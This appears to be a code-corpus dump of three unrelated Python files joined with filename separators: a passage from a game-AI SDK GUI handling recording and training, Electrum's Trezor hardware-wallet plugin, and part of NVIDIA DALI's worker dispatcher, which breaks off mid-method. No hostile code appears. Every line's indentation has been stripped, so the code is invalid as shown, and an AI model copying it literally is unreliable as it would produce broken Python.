urllib.request.urlopen(cmd)
pthread = threading.Thread(target=notify_record_process_stop, name='notify_record_process_stop', daemon=True)
pthread.start()
pthread.join(5)
@staticmethod
def _get_hwnd_by_qpath(query_path):
hwnds = probe.Win32Probe().search_element(by.QPath(query_path))
cnt = len(hwnds)
if cnt == 1:
return hwnds[0]
if cnt > 1:
show_warning_tips('found multi windows by qpath(%s)' % query_path)
else:
show_warning_tips('failed to find window by qpath(%s)' % query_path)
return None
def start_record(self):
# 判断是否已启动录制程序
if bsa.exist_process(self.ACTION_SAMPLE_SERVICE_NAME):
msg = "record is already start..."
logger.info(msg)
set_log_text(msg)
return
result = ExecResult()
self.clear_right_tree_signal.emit(result)
self.__right_tree.clear()
try:
# 转换为录制所需要的配置文件
self.__data.save_record_data()
self.__data.save_sample_action()
current_path = os.getcwd()
os.chdir(ACTION_SAMPLE_PATH)
time.sleep(0.5)
data_source = DataSource()
data_source.finish()
app_ctx = AppContext()
app_ctx.set_info("phone", False)
serial = app_ctx.get_info("phone_serial", None)
device_type = g_project_manager.get_device_type()
if serial is None and device_type == DeviceType.Windows.value:
qpath = g_project_manager.get_window_qpath()
serial = self._get_hwnd_by_qpath(qpath)
if serial:
run_program = "python main.py -s %s -p %s -m %s" % (serial, self._http_server_port, device_type)
else:
run_program = "python main.py -p %s -m %s" % (self._http_server_port, device_type)
is_ok, desc = bsa.start_service(service_name=self.ACTION_SAMPLE_SERVICE_NAME,
run_programs=run_program,
process_param_type=bsa.SUBPROCESS_SHELL_TYPE,
callback_func=backend_service_monitor,
start_internal=10)
if not is_ok:
msg = "start service %s failed, %s" % (self.ACTION_SAMPLE_SERVICE_NAME, desc)
raise RuntimeError(msg)
else:
logger.info("start service %s success", self.ACTION_SAMPLE_SERVICE_NAME)
os.chdir(current_path)
self.run_signal.emit('record', STOP_RECORD, True)
if device_type == DeviceType.Android.value:
image_name = RECORD_ANDROID_GUIDANCE_IMG
elif device_type == DeviceType.Windows.value:
image_name = RECORD_WINDOWS_GUIDANCE_IMG
else:
raise ValueError('unknown device type:%s' % device_type)
canvas_signal_inst.canvas_show_img(image_name)
self.show_record_info()
set_log_text("****start record*****")
except RuntimeError as err:
cb_msg = traceback.format_exc()
msg = "start record failed: {}\n traceback {}".format(str(err), cb_msg)
logger.error(msg)
set_log_text(msg)
def _stop_record(self):
# 尝试通过http请求通知录制进程退出
if bsa.exist_service(self.ACTION_SAMPLE_SERVICE_NAME):
self._notify_record_process_stop()
is_ok, _ = bsa.stop_service(service_name=self.ACTION_SAMPLE_SERVICE_NAME)
if not is_ok:
logger.error("stop service %s failed", self.ACTION_SAMPLE_SERVICE_NAME)
return
logger.info("stop service %s success", self.ACTION_SAMPLE_SERVICE_NAME)
self.run_signal.emit('record', '', False)
set_log_text('stop record success')
def stop_record(self):
dlg = LabelDialog(text="please confirm to stop record sample", title="confirm")
dlg.finish_signal.connect(self._stop_record)
dlg.pop_up()
def save_record_config(self):
""" 保存录制的配置
:return:
"""
tree_param = OrderedDict()
top_level_nodes = get_tree_top_nodes(self.__right_tree)
for top_level_node in top_level_nodes:
node_key = top_level_node.text(0)
if top_level_node.childCount() == 0:
node_value = top_level_node.text(1)
tree_param[node_key] = node_value
else:
tree_param[node_key] = save_action(top_level_node)
valid_number_value(tree_param)
# 添加保存路径
self.__data.save_record_data(tree_param)
@staticmethod
def _parser_acc_log(str_line):
# 以后面字符串为例, without lstm:'Iteration 0....20: train_acc is 0.5877976190476191 and val_acc is 0.6546875'
iter_info_no_lstm = re.findall(r"Iteration (.+?): train_acc is", str_line)
# NetworkLSTM: Iter 5....20: train_acc is 0.6646706576118926 and val_acc is 0.6973478939157566
iter_info_lstm = re.findall(r"Iter (.+?): train_acc is", str_line)
iter_info = iter_info_lstm if len(iter_info_lstm) > len(iter_info_no_lstm) else iter_info_no_lstm
if len(iter_info) < 1:
return -1, -1
# ['0....20']--->'0....20'
sub_iter_info = iter_info[0]
# '0....20'--->['0', '20']
iter_data = sub_iter_info.split('....')
# '0'--->0
iter_data = int(iter_data[0])
train_acc_info = re.findall(r"train_acc is (.+?) and val_acc is", str_line)
if len(train_acc_info) < 1:
return -1, -1
# ['0.5877976190476191'(str)]--->0.5877976190476191
acc_data = float(train_acc_info[0])
return iter_data, acc_data
@staticmethod
def _parser_progress(line):
# 17/18 [===========================>..] - ETA: 1s - loss: 8.9437 - acc: 0.9062
# 日志举例:48/48 [==============================] - 6s 115ms/step - loss: 0.5667 - out_task0
# target_line = re.findall(r"out_task0_loss:(.+?)out_task1_loss: ", line)
target_line = re.findall(r"loss:", line)
if len(target_line) == 0:
return -1, -1
try:
cur_num_index = line.index('/')
cur_num = line[0:cur_num_index]
cur_num = int(cur_num)
# 截取cur_num到结尾的字符
batch_num = line[cur_num_index+1:]
batch_num = batch_num.split()[0]
batch_num = int(batch_num)
return cur_num, batch_num
except RuntimeError as err:
logger.error("error: %s", str(err))
return -1, -1
def _parser_log(self):
if self.__train_process is None:
return -1, -1, -1, -1, None
self.__train_process.stdout.flush()
line = self.__train_process.stdout.readline()
if line is None:
return -1, -1, -1, -1, None
try:
str_line = line.decode('utf-8')
except ValueError as err:
logger.error('error line:%s', str(err))
logger.error('error line:%s', line)
return -1, -1, -1, -1, None
iter_data, acc_data = self._parser_acc_log(str_line)
cur_num, batch_num = self._parser_progress(str_line)
return iter_data, acc_data, cur_num, batch_num, str_line
def _paint_train_log(self):
network_param = self.__data.get_network_parameter()
if network_param is None:
logger.error("network param is none")
return
begin = time.time()
# 获取最大训练值
max_epoch = network_param['trainIter']
max_epoch = int(max_epoch)
def _paint_windows_percent(cur_iter, cur_num, batch_num, percent_data, time_data):
# 绘制进度图
if cur_num >= 0:
# 如:epoch为20, batch_num=48,共计20×48个数据
max_data = max_epoch * batch_num
# 单位秒
current = cur_iter * batch_num + cur_num
percent = int(current * 100.0 / max_data)
if percent in percent_data:
return
percent_data.append(percent)
cur_time = time.time()
cost = int((cur_time - begin) * 1000)
time_data.append(cost)
plot.plot(time_data, percent_data, '', c='g')
def _paint_Linux_percent(cur_iter, cur_num, batch_num, percent_data, time_data, pre_time):
if -1 not in [batch_num, cur_num]:
# 如:epoch为20, batch_num=48,共计20×48个数据
max_data = max_epoch * batch_num
cur_time = time.time()
interval = cur_time - pre_time
batch_cost = interval / batch_num
for i in range(1, batch_num + 1):
# 单位秒
current = cur_iter * batch_num + i
percent = int(current * 100.0 / max_data)
if percent in percent_data:
continue
percent_data.append(percent)
cur_time = time.time()
cost = int((cur_time - begin) * 1000)
time_data.append(cost)
plot.plot(time_data, percent_data, '', c='g')
time.sleep(batch_cost)
# 保存图像
plot_image_path = './test2.jpg'
plot.savefig(plot_image_path)
canvas_signal_inst.canvas_show_img(plot_image_path)
def _paint_log():
font1 = {'family': 'Times New Roman', 'weight': 'normal', 'size': 15}
iter_datas = []
acc_datas = []
cur_iter = 0
pre_time = begin
percent_data = []
time_data = []
logger.info("************start paint log************")
self.__over = False
log_text = ''
while not self.__over:
try:
iter_data, acc_data, cur_num, batch_num, str_line = self._parser_log()
# 记录日志内容
if str_line is not None:
str_line = filter_info_log(str_line)
log_text += str_line
self.log_signal.emit(log_text)
if -1 not in [iter_data, acc_data]:
# 日志输出的迭代次数从0开始
iter_data = iter_data + 1
iter_datas.append(iter_data)
acc_datas.append(acc_data)
cur_iter = iter_data
# 清空plot
plot.close('all')
_, (ax1, ax2) = plot.subplots(2, 1)
# ax2 = plot.subplot(2, 1, 2)
plot.sca(ax2)
# 绘制x轴,y轴
plot.xlabel('epoch', font1)
plot.ylabel('acc', font1)
# x的范围
plot.xticks(numpy.arange(1, max_epoch+1, step=1))
if len(iter_datas) > 0:
plot.plot(iter_datas, acc_datas, '', c='g')
# 绘制标题
if cur_iter < max_epoch:
plot.title('train(epoch current/max: {}/{})'.format(cur_iter, max_epoch), font1)
else:
plot.title('train over, max epoch: {}'.format(max_epoch), font1)
self.__over = True
# ax1 = plot.subplot(2, 1, 1)
plot.sca(ax1)
# 绘制x轴
plot.title('process')
plot.xlabel('cost time(ms)', font1)
# 绘制y轴
plot.ylabel('percent(%)', font1)
plot.plot(time_data, percent_data, '', c='g')
plot.tight_layout()
# 绘制进度图
if IS_WINDOWS_SYSTEM:
_paint_windows_percent(cur_iter, cur_num, batch_num, percent_data, time_data)
else:
_paint_Linux_percent(cur_iter, cur_num, batch_num, percent_data, time_data, pre_time)
pre_time = time.time()
# 保存图像
plot_image_path = 'test2.jpg'
plot.savefig(plot_image_path)
if not is_image(plot_image_path):
continue
# 加载图像文件
canvas_signal_inst.canvas_show_img(plot_image_path)
if self.__over:
ai_sdk_path = os.environ.get('AI_SDK_PATH')
if ai_sdk_path is None:
ai_sdk_path = SDK_PATH
log_text += "train over....\n save mode to path: '{}/data/ImitationModel/'.".format(ai_sdk_path)
self.log_signal.emit(log_text)
plot.close(1)
except RuntimeError as e:
exp = traceback.format_exc()
logger.error("************ %s %s ****", str(e), exp)
paint_log_thread = threading.Thread(target=_paint_log, args=())
paint_log_thread.start()
def start_train(self):
# 判断是否已启动训练程序
if bsa.exist_service(service_name=self.AISDK_TRAIN_SERVICE_NAME):
logger.info("train is already start...")
set_log_text("train is already start...")
return
result = ExecResult()
self.clear_right_tree_signal.emit(result)
self.__right_tree.clear()
try:
# 停止已有连接
data_source = DataSource()
data_source.finish()
app_ctx = AppContext()
app_ctx.set_info("phone", False)
# 进入bin目录
current_path = os.getcwd()
os.chdir(BIN_PATH)
time.sleep(1)
project_config_path = g_project_manager.get_project_property_file()
run_program = 'python agentai.py --mode=train --cfgpath=%s' % project_config_path
is_ok, desc = bsa.start_service(service_name=self.AISDK_TRAIN_SERVICE_NAME,
run_programs=run_program,
process_param_type=bsa.SUBPROCESS_STDOUT_TYPE,
callback_func=backend_service_monitor)
if not is_ok:
raise Exception('start service {} failed, {}'.format(self.AISDK_TRAIN_SERVICE_NAME, desc))
self.__train_process = bsa.get_processes(self.AISDK_TRAIN_SERVICE_NAME)
os.chdir(current_path)
self.run_signal.emit('train', STOP_TRAIN, True)
# 显示训练信息
self.show_train_info()
set_log_text("start train")
self._is_training = True
# 绘制训练信息
self._paint_train_log()
except RuntimeError as err:
msg = traceback.format_exc()
msg = "start train failed: {}, traceback {}".format(err, msg)
logger.error(msg)
set_log_text(msg)
def _stop_train(self):
self.run_signal.emit('train', '', False)
if not bsa.exist_service(service_name=self.AISDK_TRAIN_SERVICE_NAME):
return
if not self._is_training:
return
logger.info("stop train process")
bsa.stop_service(service_name=self.AISDK_TRAIN_SERVICE_NAME)
self.__train_process = None
self._is_training = False
def stop_train(self):
self.__over = True
# 等待1s,等待线程处理结束
set_log_text('stop train..')
self._stop_train()
time.sleep(1)
app_ctx = AppContext()
app_ctx.set_info("phone", True)
def finish(self):
self._stop_record()
self._stop_train()
|
trezor.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, versiontuple, UserCancelled
from electrum.bitcoin import (b58_address_to_hash160, xpub_from_pubkey, deserialize_xpub,
TYPE_ADDRESS, TYPE_SCRIPT, is_address)
from electrum import constants
from electrum.i18n import _
from electrum.plugins import BasePlugin, Device
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey, xtype_from_derivation
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(0, 2)
# script "generation"
SCRIPT_GEN_LEGACY, SCRIPT_GEN_P2SH_SEGWIT, SCRIPT_GEN_NATIVE_SEGWIT = range(0, 3)
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = 'TREZOR'
def get_derivation(self):
return self.derivation
def get_script_gen(self):
xtype = xtype_from_derivation(self.derivation)
if xtype in ('p2wpkh', 'p2wsh'):
return SCRIPT_GEN_NATIVE_SEGWIT
elif xtype in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return SCRIPT_GEN_P2SH_SEGWIT
else:
return SCRIPT_GEN_LEGACY
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 9, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
# Minimal test if python-trezor is installed
import trezorlib
try:
library_version = trezorlib.__version__
except AttributeError:
# python-trezor only introduced __version__ in 0.9.0
library_version = 'unknown'
if library_version == 'unknown' or \
versiontuple(library_version) < self.minimum_library:
self.libraries_available_message = (
_("Library version for '{}' is too old.").format(name)
+ '\nInstalled: {}, Needed: {}'
.format(library_version, self.minimum_library))
self.print_stderr(self.libraries_available_message)
raise ImportError()
self.libraries_available = True
except ImportError:
self.libraries_available = False
return
from . import client
from . import transport
import trezorlib.messages
self.client_class = client.TrezorClient
self.types = trezorlib.messages
self.DEVICE_IDS = ('TREZOR',)
self.transport_handler = transport.TrezorTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(d.get_path(), -1, d.get_path(), 'TREZOR', 0) for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
model = client.get_trezor_model()
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, model)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection, recovery_type = settings
if method == TIM_RECOVER and recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
if recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
recovery_type_trezor = self.types.RecoveryDeviceType.ScrambledWords
else:
recovery_type_trezor = self.types.RecoveryDeviceType.Matrix
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language,
type=recovery_type_trezor)
if recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, script_gen, is_multisig):
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
return self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
return self.types.InputScriptType.SPENDP2SHWITNESS
else:
if is_multisig:
return self.types.InputScriptType.SPENDMULTISIG
else:
return self.types.InputScriptType.SPENDADDRESS
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.get_script_gen())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.get_script_gen())
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_gen = keystore.get_script_gen()
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=False)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_gen = keystore.get_script_gen()
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=True)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, script_gen=SCRIPT_GEN_LEGACY):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_trezor_input_script_type(script_gen, is_multisig=False)
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=True)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, script_gen=SCRIPT_GEN_LEGACY):
def create_output_by_derivation(info):
index, xpubs, m = info
if len(xpubs) == 1:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for _type, address, amount in tx.outputs():
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation(info)
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
worker.py
|
# Copyright (c) 2020-2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import traceback
import os
import socket
from multiprocessing import reduction
from nvidia.dali._multiproc.shared_batch import SharedMemChunk, write_batch, assert_valid_data_type
from nvidia.dali._multiproc.messages import CompletedTasks
class _ProcessedTasks:
"""Internal worker message send to disptacher with completed tasks where it is
serialized and dispatched to the pool"""
def __init__(self, scheduled, mem_chunk=None, data_batch=None, exception=None,
traceback_str=None):
self.context_i = scheduled.context_i
self.batch_i = scheduled.batch_i
self.mem_chunk = mem_chunk
self.data_batch = data_batch
self.exception = exception
self.traceback_str = traceback_str
@classmethod
def done(cls, scheduled, mem_chunk, data_batch):
return cls(scheduled, mem_chunk, data_batch)
@classmethod
def failed(cls, scheduled, exception, traceback_str=None):
return cls(scheduled, exception=exception, traceback_str=traceback_str)
def is_failed(self):
return self.exception is not None
class SharedBatchesDispatcher:
"""SharedBatchesDispatcher serializes batches, puts them into provided
shared memory chunks and notifies parent process of batch ready to be read from shared memory.
It keeps track of what shared memory chunks have been already sent and if needed, sends
file descriptors of memory chunks that parent process hasn't seen yet.
Parameters
----------
`worker_id` : int
Id of the worker passed by the parent process. Added to messages sent over the ``res_pipe``
to simplify bookeeping in parent process.
`sock` : socket
Python wrapper around Unix socket, capable of sending file descriptors between processes.
`res_pipe`: pipe
Pipe used to send parent process a notification (along with essential meta data info) about
ready batch in a given shared memory chunk.
"""
def __init__(self, worker_id, sock, res_pipe):
self.worker_id = worker_id
self.handle_sent = set()
self.sock = sock
self.res_pipe = res_pipe
self.ready_cv = threading.Condition()
self.ready_queue = []
def dispatch(self, processed_task: _ProcessedTasks):
"""Pass the processed task (or None to end) to the dispatcher.
"""
with self.ready_cv:
if processed_task is None:
self.ready_queue.insert(0, None)
else:
self.ready_queue.append(processed_task)
self.ready_cv.notify()
def dispatcher_thread(self):
"""Receives batches produced in the main thread and dispatches them to the parent process.
It is intended to be run in a separate thread because both callback and dispatcher may
wait on IO operations a lot and in that case Python threads provide some performance gain.
"""
try:
while True:
message = self._wait_for_processed()
if message is None:
break
self._send(message)
finally:
# In case of error, we don't know when exactly we were interrupted and the main process
# may be waiting for differant message that we would try to send. Close the communication
# to indicate an error for main process and allow the exception to propagate
# in the worker process.
self._shutdown()
def _wait_for_processed(self):
with self.ready_cv:
while len(self.ready_queue) == 0:
self.ready_cv.wait()
message = self.ready_queue.pop(0)
return message
def _send(self, processed_tasks: _ProcessedTasks):
"""Send the processed task back to the main process"""
if processed_tasks.is_failed(): # one of the tasks failed
completed_tasks = CompletedTasks.failed(self.worker_id, processed_tasks)
self.res_pipe.send(completed_tasks)
return
serialized_batch = write_batch(processed_tasks.mem_chunk, processed_tasks.data_batch)
completed_tasks = CompletedTasks.done(self.worker_id, processed_tasks, serialized_batch)
self.res_pipe.send(completed_tasks)
# send shared memory handle for underlaying shared memory chunk
# if it hasn't been sent ever before
mem_chunk_id = serialized_batch.mem_chunk_id
if mem_chunk_id not in self.handle_sent:
self.handle_sent.add(mem_chunk_id)
